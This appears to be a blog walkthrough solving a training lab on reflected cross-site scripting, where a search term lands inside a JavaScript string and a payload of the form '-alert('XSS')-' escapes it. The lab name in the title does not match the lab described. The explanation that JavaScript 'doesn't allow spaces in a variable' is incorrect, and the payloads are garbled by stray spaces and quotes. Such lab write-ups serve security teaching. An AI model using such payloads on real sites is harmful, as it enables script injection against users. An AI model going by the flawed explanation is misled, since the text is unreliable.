In this post, we’re going to be solving the lab: “Reflected XSS into attribute with angle brackets HTML-encoded”.

Reflected XSS into a JavaScript string lab start screen

In this case, to solve the challenge we need to inject a payload that escapes from the string where it’s located and calls the alert function.

First of all, let’s access the lab:

Lab main page with search bar

Once we access it, we find ourselves before a search bar, so we’re going to use it by searching for a random word:

Search form with test term

When we perform the search, we can observe that the word we searched for is found, among other places, in the following part of the source code

Source code showing search term inside a JavaScript string

As we can observe, it’s a string. You might think, ok, I close the variable, put an alert and done, something like:

  • var searchTerms= ' alert('XSS') '

But this is not valid, since JavaScript doesn’t allow spaces in a variable, for this same reason so that the entire string is taken as part of the variable, and even so, the alert executes, it’s concatenated using a hyphen. In the StackOverflow documentation you can see a more detailed explanation about the treatment of hyphens in JavaScript.

That said, we place a payload like:

  • ' '-alert('XSS')-' '

XSS payload injected in the search field

And when we click search:

Successful alert execution escaping from the JavaScript string

The alert will have been executed. In the source code, it will be seen as follows:

Source code showing successfully injected payload

With this, we complete the lab:

Final confirmation of lab success

Share on X Share on LinkedIn Share on Telegram
Comment on Discord Visit the author page